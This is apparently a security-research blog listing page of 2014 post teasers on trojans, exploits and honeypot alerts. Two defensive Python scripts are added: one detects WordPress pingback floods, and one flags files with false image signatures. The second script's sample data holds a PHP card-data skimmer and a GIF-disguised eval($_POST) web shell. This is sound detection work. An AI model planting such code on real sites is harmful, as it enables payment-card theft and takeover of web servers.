Showing 49 results for: 2014, Security Research

Analysis of a New Banking Trojan Spammed by Cutwail

The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail’s portfolio is to use links pointing to popular file hosting services. Over the past...

CVE-2014-2120 – A Tale of Cisco ASA “Zero-Day”

A few months ago I was trying to PoC a known cross-site scripting vulnerability in the Cisco ASA WebVPN portal (CVE-2013-3414) for inclusion in the TrustKeeper Scan Engine. I tried a number of different techniques on multiple different ASA versions/branches...

Baby's first NX+ASLR bypass

Recently, I've been trying to improve my skills with regards to exploiting memory corruption flaws. While I've done some work in the past with exploiting basic buffer overflows, format string issues, etc., I'd only done the most basic work in...

[Honeypot Alert] Open Flash Charts File Upload Attacks

Our web honeypots picked up some increased scanning/exploit activity for the following file upload vulnerability in Open Flash Charts. The following screenshot shows the contents of the vulnerable ofc_upload_image.php file. As you can see from this simple code, there...

[Honeypot Alert] JCE Joomla Extension Attacks

Our web honeypots picked up some increased exploit attempts for an old Joomla Content Editor (JCE) Extension vulnerability. Although this vulnerability is a few years old, botnet owners are heavily scanning for sites that are vulnerable and attempting to exploit...

ColdFusion Admin Compromise Analysis (CVE-2010-2861)

In a previous blog post, I provided "Method of Entry" analysis for a ColdFusion compromise based on sanitized data from a SpiderLabs IR/Forensics team investigation which resulted in the attacker installing a malicious IIS module that captured customer credit card...

WordPress XML-RPC PingBack Vulnerability Analysis

There were news stories this week outlining how attackers are abusing the XML-RPC "pingback" feature of WordPress blog sites to launch DDoS attacks on other sites. This blog post will provide some analysis on this attack and additional information for...
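The pingback abuse described in that teaser is visible from the victim's side: the flood arrives as GET requests whose User-Agent names the WordPress version and home URL of each blog that was tricked into "verifying" the pingback. The script below is an added example written for this page, not code from the original post; the access log lines, hostnames and IP addresses are constructed, and the cache-busting numeric query string is the pattern seen in that campaign.

```python
"""
Victim-side detection of a WordPress pingback reflection flood from
web server access logs. Added example; log lines below are constructed.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A blog fetching the pingback's sourceURI identifies itself as
# "WordPress/<version>; <home URL>", so the UA names the abused reflector.
WP_UA_RE = re.compile(r'^WordPress/(?P<ver>[\d.]+); (?P<home>https?://[^;\s]+)')

# Constructed sample log (documentation-range addresses, made-up hostnames).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2014:14:22:01 +0000] "GET /?4356 HTTP/1.0" 200 51234 "-" "WordPress/3.8.1; http://blog-a.example"
198.51.100.7 - - [10/Mar/2014:14:22:01 +0000] "GET /?88213 HTTP/1.0" 200 51234 "-" "WordPress/3.5.2; http://blog-b.example"
203.0.113.10 - - [10/Mar/2014:14:22:02 +0000] "GET /?19 HTTP/1.0" 200 51234 "-" "WordPress/3.8.1; http://blog-a.example"
192.0.2.44 - - [10/Mar/2014:14:22:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "http://www.example/" "Mozilla/5.0 (Windows NT 6.1) Firefox/27.0"
198.51.100.7 - - [10/Mar/2014:14:22:03 +0000] "GET /?77 HTTP/1.0" 200 51234 "-" "WordPress/3.5.2; http://blog-b.example"
203.0.113.99 - - [10/Mar/2014:14:22:03 +0000] "GET /?5 HTTP/1.0" 200 51234 "-" "WordPress/3.7; http://blog-c.example"
"""


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def pingback_reflections(log_text):
    """Return (requests per reflecting blog, fraction with a purely numeric
    cache-busting query string) for all requests made by WordPress UAs."""
    per_home = Counter()
    busting = total = 0
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ua = WP_UA_RE.match(rec["ua"])
        if ua is None:
            continue  # ordinary browser traffic
        total += 1
        per_home[ua["home"]] += 1
        if urlsplit(rec["path"]).query.isdigit():
            busting += 1
    return per_home, (busting / total if total else 0.0)


def is_reflection_flood(per_home, min_reflectors=3):
    """Many distinct WordPress sites hitting us at once is the signature of
    reflection; a single blog verifying one real pingback is not."""
    return len(per_home) >= min_reflectors


if __name__ == "__main__":
    counts, frac = pingback_reflections(SAMPLE_LOG)
    print("reflectors:", dict(counts))
    print("cache-busting fraction:", frac)
    print("flood:", is_reflection_flood(counts))
```

The per-reflector counter is the useful output: each key is a WordPress site that can be notified (or that the blog owner should fix by disabling pingbacks), and the numeric-query fraction separates reflected traffic from a legitimate pingback check, which fetches the real post URL once.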

Deep Analysis of CVE-2014-0502 – A Double Free Story

A lot has already been said about CVE-2014-0502, the Adobe Flash Player zero-day that was part of a targeted attack that infected several nonprofit organizations’ websites. Several interesting aspects of the exploit were covered in various blog posts; including its...

Look What I Found: Pony is After Your Coins!

In our previous episode of "Look What I Found" we detailed our discovery of a humongous instance of a Pony botnet controller that stole credentials for approximately two million websites, social networks, e-mails and other types of accounts. We recently...

Wait a minute... that’s not a real JPG!

When attackers compromise a website and want to harvest credit cards, they need to either find where the data is stored or capture the data in transit. This blog post shows how identifying files with false file signatures can uncover...
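The "false file signature" check that teaser refers to is a comparison of a file's leading bytes (its magic number) with the type its extension claims. The script below is an added example, not code from the original post: it sniffs JPEG, PNG and GIF signatures, flags name/content mismatches, and adds a cheap PHP-marker check for the polyglot case where the attacker keeps a valid image header in front of the code. All sample file contents are constructed.

```python
"""
Flag files whose content does not match the type their extension claims.
Added example; sample bytes below are constructed.
"""
from __future__ import annotations

# Leading bytes ("magic numbers") for the image types we care about.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXT_ALIASES = {"jpeg": "jpg"}


def sniff(data: bytes) -> str | None:
    """Return the image type the leading bytes claim, or None if unrecognised."""
    for kind, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return kind
    return None


def looks_like_php(data: bytes) -> bool:
    """Heuristic for PHP hiding behind an image name; a valid image header
    does not rule this out, so it is checked independently of sniff()."""
    head = data[:4096]
    return b"<?php" in head or b"<?=" in head


def check_file(name: str, data: bytes) -> dict:
    """Compare claimed type (from extension) with actual type (from bytes)."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    claimed = EXT_ALIASES.get(ext, ext)
    actual = sniff(data)
    return {
        "name": name,
        "claimed": claimed,
        "actual": actual,
        # Only judge extensions we know a signature for; README etc. pass.
        "mismatch": claimed in MAGIC and actual != claimed,
        "php": looks_like_php(data),
    }


# Constructed samples: two honest images, one bare PHP file named .jpg,
# one honest GIF, and one GIF-headed PHP polyglot named .jpg.
SAMPLES = {
    "logo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01",
    "banner.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
    "image.jpg": b"<?php file_put_contents('/tmp/cc.txt', print_r($_POST, true)); ?>",
    "pixel.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
    "thumb.jpg": b"GIF89a<?php eval($_POST['x']); ?>",
}


def suspicious_files(samples: dict = SAMPLES) -> list[str]:
    """Names whose signature contradicts the extension or that carry PHP."""
    out = []
    for name, data in samples.items():
        r = check_file(name, data)
        if r["mismatch"] or r["php"]:
            out.append(name)
    return sorted(out)


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(check_file(name, data))
    print("suspicious:", suspicious_files())
```

On a real web root the same logic is what `file` and `find -exec` give you, but the second check matters: "thumb.jpg" above sniffs as a perfectly good GIF, and only the PHP marker exposes it, so a signature check alone is not enough when the server can be made to execute the file.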